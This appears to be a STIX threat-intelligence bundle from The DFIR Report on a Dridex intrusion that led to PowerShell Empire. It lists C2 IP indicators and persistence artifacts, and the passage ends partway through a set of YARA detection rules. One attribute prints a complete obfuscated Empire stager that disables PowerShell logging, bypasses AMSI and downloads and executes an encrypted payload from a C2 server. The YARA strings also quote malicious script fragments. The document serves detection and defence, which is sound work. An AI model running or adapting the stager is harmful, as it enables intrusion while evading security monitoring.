{ "type": "bundle", "id": "bundle--946e7701-5bdd-4efe-ae94-a6626fc8092b", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T20:04:33.000Z", "modified": "2020-08-03T20:04:33.000Z", "name": "The DFIR Report", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--946e7701-5bdd-4efe-ae94-a6626fc8092b", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T20:04:33.000Z", "modified": "2020-08-03T20:04:33.000Z", "name": "Dridex to Empire", "published": "2020-08-03T20:05:47Z", "object_refs": [ "x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541", "indicator--39f56fa9-58f9-4962-a4e9-809182990f7d", "indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af", "indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268", "indicator--ef331607-0a3d-4770-b9da-33708b3e1a10", "indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3", "indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0", "indicator--587aa626-f57e-444e-b1c1-ab3491f99a10", "indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2", "indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1", "indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4", "indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6", "indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92", "indicator--c176ce15-acd2-4573-9991-8e19d4953c4f", "indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30", "indicator--931290f5-12fd-493e-802f-4e9e132a6a0d", "indicator--80882b5d-a04b-4963-a324-e9778acbaec6", "indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3", "indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6", "observed-data--5938cc58-c427-4a29-808b-fcdfcd62ff7d", "url--5938cc58-c427-4a29-808b-fcdfcd62ff7d", "indicator--be484895-ebf6-4a2d-b492-e8810cd8f793", "indicator--46037d3e-727a-4508-8dcb-d10de58a764f", "indicator--612fb261-eeee-4173-a89d-074aad7c64d2", "indicator--513494bf-37dd-4704-a5ea-15155c29c4fc", "indicator--22e9a211-22e7-45d2-9b39-33a01b5e9c69", "indicator--7b2b9772-9059-4651-84e8-bc066e15b917", "indicator--63b24626-a14c-4bf1-951d-fd726a7fdac2", "indicator--9bb216ae-af15-4cba-9d65-40be296d9438", "indicator--aec61910-1c29-47c5-88c9-37621ded62dd", "indicator--91bd79c2-d620-474e-9e81-52a3f7fe00d7", "indicator--2f0ff8d3-3e6b-4421-addd-6505f38211d2", "x-misp-object--0537282b-b524-441b-bc04-7b894b342a40", "x-misp-object--856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6", "x-misp-object--f5deb688-77b3-4f0b-b997-0692d1966239", "x-misp-object--30d4ea8b-bb35-4cc9-aa4d-b95f65834786", "x-misp-object--65b78289-00e3-405f-a669-e21c4b240aff", "x-misp-object--5e30f0a7-f2e0-4669-aadd-6ef0de574e31", "x-misp-object--b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867", "x-misp-object--cda02ce6-6495-448b-a881-94dd8b6ea251", "x-misp-object--2b213ae5-83b6-4e62-b2e9-bb58a3375ef2", "x-misp-object--3a117e2f-ba72-4253-aae3-e47373b3b29f", "x-misp-object--78fb4f68-a212-4ba1-af11-4943011c012c", "x-misp-object--47b6935a-b4bd-4045-b600-c0a4213d3ec1", "x-misp-object--0dbb4f9b-5415-4aba-b478-3ae76496cbc0", "x-misp-object--ae062334-3a88-45b4-9331-ed9a80fc7218", "x-misp-object--072b4d8e-b602-458e-9a96-71242a752828" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "Dridex", "Powershell Empire", "misp-galaxy:tool=\"Dridex\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-07-15T19:55:43.000Z", "modified": "2020-07-15T19:55:43.000Z", "labels": [ "misp:type=\"text\"", "misp:category=\"Artifacts dropped\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Artifacts dropped", "x_misp_type": "text", "x_misp_value": "If($PSVERSiOnTaBlE.PSVERsIOn.MajOr -Ge 3){$GPF=[reF].AsseMbLy.GETTYpe('System.Management.Automation.Utils').\"GETFiE`ld\"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtVaLuE($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[CoLLECtIONS.GeneRIC.DiCtIONArY[strING,SyStem.ObJeCT]]::nEW();$VAl.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScrIpTBlock].\"GetFIe`ld\"('signatures','N'+'onPublic,Static').SETValUE($NUll,(NEw-ObJect COLlecTiONs.GEneRic.HASHSet[sTrInG]))}[Ref].AsSEMbLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIelD('amsiInitFailed','NonPublic,Static').SETVAlue($null,$TRUe)};};[SYsTEM.NET.SerVIcEPoIntMaNAger]::ExPECt100CONTinuE=0;$Wc=New-ObJecT SYSTem.NET.WeBClIent;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeAdERs.ADD('User-Agent',$u);$WC.PrOXY=[SYsTEm.NET.WebREQuEst]::DeFaULTWeBProxY;$WC.PROxy.CrEDENtiAls = [SYSTeM.NeT.CREDENTIALCaChe]::DeFAULTNetWORkCREdenTialS;$Script:Proxy = $wc.Proxy;$K=[SYstEm.TExT.ENCOdiNG]::ASCII.GeTBYTES('b6dc9515bf3161700de268130726d162');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOR$S[($S[$I]+$S[$H])%256]}};$ser='https://194.99.22.145:443';$t='/login/process.php';$wC.HeADerS.ADD(\"Cookie\",\"session=TI47O5rucSxxojlrBjwysXKBrRQ=\");$DATA=$WC.DOWnLOADDatA($seR+$t);$iV=$daTA[0..3];$DATa=$daTA[4..$DaTA.LenGTh];-join[Char[]](& $R $DAta ($IV+$K))|IEX" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--39f56fa9-58f9-4962-a4e9-809182990f7d", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-07-15T20:32:15.000Z", "modified": "2020-07-15T20:32:15.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '194.99.22.145']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-07-15T20:32:15Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "kill-chain:Command and Control", "Powershell Empire" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-07-15T20:31:54.000Z", "modified": "2020-07-15T20:31:54.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '64.118.8.15']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-07-15T20:31:54Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-07-15T20:31:49.000Z", "modified": "2020-07-15T20:31:49.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '59.148.253.194']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-07-15T20:31:49Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--ef331607-0a3d-4770-b9da-33708b3e1a10", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-07-21T02:21:32.000Z", "modified": "2020-07-21T02:21:32.000Z", "pattern": "[windows-registry-key:key = '\\\\HKEY_USERS\\\\S-1-5-21-1761595937-4212512506-1431507687-12106\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Zvhlxdonjwfvei']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-07-21T02:21:32Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Persistence mechanism" } ], "labels": [ "misp:type=\"regkey\"", "misp:category=\"Persistence mechanism\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-07-21T02:22:45.000Z", "modified": "2020-07-21T02:22:45.000Z", "pattern": "[file:name = '\\\\%APPDATA\\\\%\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\swET\\\\bdechangepin.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-07-21T02:22:45Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload installation" } ], "labels": [ "misp:type=\"filename\"", "misp:category=\"Payload installation\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T01:22:22.000Z", "modified": "2020-08-03T01:22:22.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.58.16.87']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T01:22:22Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--587aa626-f57e-444e-b1c1-ab3491f99a10", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T01:22:22.000Z", "modified": "2020-08-03T01:22:22.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '144.168.239.42']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T01:22:22Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T01:22:21.000Z", "modified": "2020-08-03T01:22:21.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '216.52.109.40']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T01:22:21Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T01:22:21.000Z", "modified": "2020-08-03T01:22:21.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.221.43']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T01:22:21Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T01:22:21.000Z", "modified": "2020-08-03T01:22:21.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '104.131.103.128']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T01:22:21Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T01:22:20.000Z", "modified": "2020-08-03T01:22:20.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '54.39.34.24']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T01:22:20Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T01:22:20.000Z", "modified": "2020-08-03T01:22:20.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '192.99.103.228']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T01:22:20Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--c176ce15-acd2-4573-9991-8e19d4953c4f", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T01:22:20.000Z", "modified": "2020-08-03T01:22:20.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.80.178.251']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T01:22:20Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T01:20:19.000Z", "modified": "2020-08-03T01:20:19.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '75.170.61.45']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T01:20:19Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--931290f5-12fd-493e-802f-4e9e132a6a0d", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T10:20:57.000Z", "modified": "2020-08-03T10:20:57.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '199.66.90.63']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T10:20:57Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--80882b5d-a04b-4963-a324-e9778acbaec6", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T10:20:34.000Z", "modified": "2020-08-03T10:20:34.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.223.244']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T10:20:34Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T10:20:09.000Z", "modified": "2020-08-03T10:20:09.000Z", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '209.74.126.2']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2020-08-03T10:20:09Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"", "Dridex", "kill-chain:Command and Control" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6", "created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f", "created": "2020-08-03T20:04:33.000Z", "modified": "2020-08-03T20:04:33.000Z", "pattern": "[/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2020-07-29\r\n Identifier: dridex-yara\r\n Reference: https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\n*/\r\n\r\n/* Rule Set ----------------------------------------------------------------- */\r\n\r\nimport \"pe\"\r\n\r\nrule dridex_yara_ufo {\r\n meta:\r\n description = \"dridex-yara - file ufo.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"usersJRB\" fullword wide\r\n $s5 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s6 = \"2017,2uchannelsPYDudays\" fullword wide\r\n $s7 = \"torrespondedthanfshadow\" fullword wide\r\n $s8 = \"increasing.includeda7iexample,Hofgodzilla\" fullword wide\r\n $s9 = \"haveand2system-providedreleasenoneJgZtest,\" fullword wide\r\n $s10 = \"wsupport3voftenfromR\" fullword wide\r\n $s11 = \"tofwerentheFirefox.149simplerunstableqqinformation\" fullword wide\r\n $s12 = \"11.172.2.11\" fullword wide\r\n $s13 = \"Dinsettheir\" fullword wide\r\n $s14 = \"yofthe\" fullword wide\r\n $s15 = \"TLty2_J \" fullword ascii\r\n $s16 = \"CosZTX^&% \" fullword ascii\r\n $s17 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s18 = \"4vthethatfour-part\" fullword wide\r\n $s19 = \"GkaChrome\" fullword wide\r\n $s20 = \"L$<;D$<\" fullword ascii /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"e37c1c1a736faeeff7de27f075619f47\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_cannot_but_soft {\r\n meta:\r\n description = \"dridex-yara - file cannot_but_soft.xsl\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6\"\r\n strings:\r\n $s1 = \"var a_couch_for = [\\\"love_is_by\\\",\\\"all_but_keep\\\",\\\"summons_i_th\\\",\\\"humanity_so_we\\\",\\\"thus_hath_fed\\\",\\\"and_stood_between\\\",\" wide\r\n $s2 = \"{var and_light_than = [\\\"tween_their_course\\\",\\\"ophelia_distracted\\\",\\\"marriage_and_both\\\",\\\"of_us_grant\\\",\\\"nor_eye_and\\\",\\\"hum\" wide\r\n $s3 = \"xmlns=\\\"http://www.w3.org/1999/XSL/Transform\\\" xmlns:ms=\\\"urn:schemas-microsoft-com:xslt\\\" \" fullword wide\r\n $s4 = \"while (among_a_father + then_this_be >= new Date().getTime()) {}}\" fullword wide\r\n $s5 = \"\" fullword wide\r\n $s6 = \"]]> \" fullword wide\r\n $s7 = \"\" fullword wide\r\n $s8 = \"{var among_a_father = new Date().getTime();\" fullword wide\r\n $s9 = \"it_so_mope(\\\"rundll32 \\\".concat(locks_to_all.concat(\\\" \\\".concat(\\\"DllRegisterServer\\\"))))\" fullword wide\r\n $s10 = \"xmlns:user=\\\"placeholder\\\" \" fullword wide\r\n $s11 = \"var locks_to_all = \\\"%WINDIR%\\Temp/\\\".concat(\\\"/\\\".concat(my_acquittance))\" fullword wide\r\n $s12 = \"{return leaves_in_his.readystate}\" fullword wide\r\n $s13 = \"function unproportion_d_no(leaves_in_his)\" fullword wide\r\n $s14 = \"run(for_s_purpose)}}\" fullword wide\r\n $s15 = \"version=\\\"1.0\\\">\" fullword wide\r\n $s16 = \"if(beast_so_as(call_it_an)=== 150+50 && unproportion_d_no(call_it_an) === 1+3)\" fullword wide\r\n $s17 = \"var lecture_and_polonius = \\\"wscript.\\\".concat(first_corse_again);\" fullword wide\r\n $s18 = \"with (now_it_profanely){\" fullword wide\r\n $s19 = \"{return of_his_solicitings.status}\" fullword wide\r\n $s20 = \"couplets_are_embark.close();\" fullword wide\r\n condition:\r\n uint16(0) == 0xfeff and filesize < 20KB and\r\n 8 of them\r\n}\r\n\r\n\r\nrule dridex_yara_marple {\r\n meta:\r\n description = \"dridex-yara - file marple.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"cb81e371e2a4d3371e051b1f15674ce6cb94e257d28ddc1a5209bb56c71dd27a\"\r\n strings:\r\n $s1 = \"vplD.dll\" fullword ascii\r\n $s2 = \"wtrter.dll\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"RRR333\" fullword ascii /* reversed goodware string '333RRR' */\r\n $s5 = \"nProtect KeyCrypt Program Database DLL\" fullword wide\r\n $s6 = \"VVV&&&\" fullword ascii /* reversed goodware string '&&&VVV' */\r\n $s7 = \"PPPPP$\" fullword ascii /* reversed goodware string '$PPPPP' */\r\n $s8 = \"LIO.pdb\" fullword ascii\r\n $s9 = \"0!\\\"!!!\" fullword ascii\r\n $s10 = \"3930, 00, 0, 0\" fullword wide /* hex encoded string '90' */\r\n $s11 = \"))44)44'7+4)?\" fullword ascii /* hex encoded string 'DDt' */\r\n $s12 = \"=22222222=\" fullword ascii /* hex encoded string '\"\"\"\"' */\r\n $s13 = \"44==========-\" fullword ascii /* hex encoded string 'D' */\r\n $s14 = \"7733.--!&\" fullword ascii /* hex encoded string 'w3' */\r\n $s15 = \"#44##'&# {\" fullword ascii /* hex encoded string 'D' */\r\n $s16 = \"doqdoqdoqdoqdoqdoqdoqdoqdoqdoqdoq\" fullword ascii\r\n $s17 = \"doqdoqdoqdoqdoqdoqdoqdoqdoqdoqdoqdoq\" fullword ascii\r\n $s18 = \"xwxwwwwwxwxwwwwwxwx\" fullword ascii\r\n $s19 = \"wxwxwwwwwxwxwwwwwxwx\" fullword ascii\r\n $s20 = \"doqdoqdoqdoq\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 1000KB and\r\n ( pe.imphash() == \"b575de8cf342823d87afbf497885b43d\" and pe.exports(\"pfrBpdm16\") or 8 of them )\r\n}\r\n\r\nrule dridex_yara_123 {\r\n meta:\r\n description = \"dridex-yara - file 123.bin\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"e88dfd4bef8c502ef2b711fd025aa321244dbca1eab80586b07187b3cf261de3\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"sself.exe\" fullword wide\r\n $s4 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s5 = \"11.172.2.11\" fullword wide\r\n $s6 = \"a}d+ #\" fullword ascii\r\n $s7 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s8 = \"Vxkc*P,BNG\" fullword ascii\r\n $s9 = \"Fpreferences,betweenpreviouslyX\" fullword wide\r\n $s10 = \"anLK'mT\" fullword ascii\r\n $s11 = \"LoMo?w\" fullword ascii\r\n $s12 = \"FSxH0P;:J\" fullword ascii\r\n $s13 = \"-ATXg3\\\"\" fullword ascii\r\n $s14 = \"OofPNsPoint\" fullword wide\r\n $s15 = \"qrKn!6\" fullword ascii\r\n $s16 = \"BinN$L\" fullword ascii\r\n $s17 = \"thepwithZthebar\" fullword wide\r\n $s18 = \"NyRaG@g\" fullword ascii\r\n $s19 = \"HgWVIbD\" fullword ascii\r\n $s20 = \"'JZCnX;}p{\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"261439292fcce3e9d2f6f3cdfbf610b2\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_yara_rvhz1 {\r\n meta:\r\n description = \"dridex-yara - file rvhz1.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab\"\r\n strings:\r\n $s1 = \"c:\\\\Cover\\\\particular\\\\Mind\\\\Difficult\\\\engine\\\\Tool\\\\Under.pdb\" fullword ascii\r\n $s2 = \"constructor or from DllMain.\" fullword ascii\r\n $s3 = \"3.2.4.465\" fullword wide /* hex encoded string '2De' */\r\n $s4 = \"576=6_6}6\" fullword ascii /* hex encoded string 'Wff' */\r\n $s5 = \":*:1:G:\\\\:b:k:r:\" fullword ascii\r\n $s6 = \":Q:V:\\\\:z:\" fullword ascii\r\n $s7 = \"xzRamj6\" fullword ascii\r\n $s8 = \"VVtW;' \" fullword ascii\r\n $s9 = \"History Kill Few\" fullword wide\r\n $s10 = \" 1999-2017 History Kill Few, Inc.\" fullword wide\r\n $s11 = \"hExpY^f\" fullword ascii\r\n $s12 = \"<'<9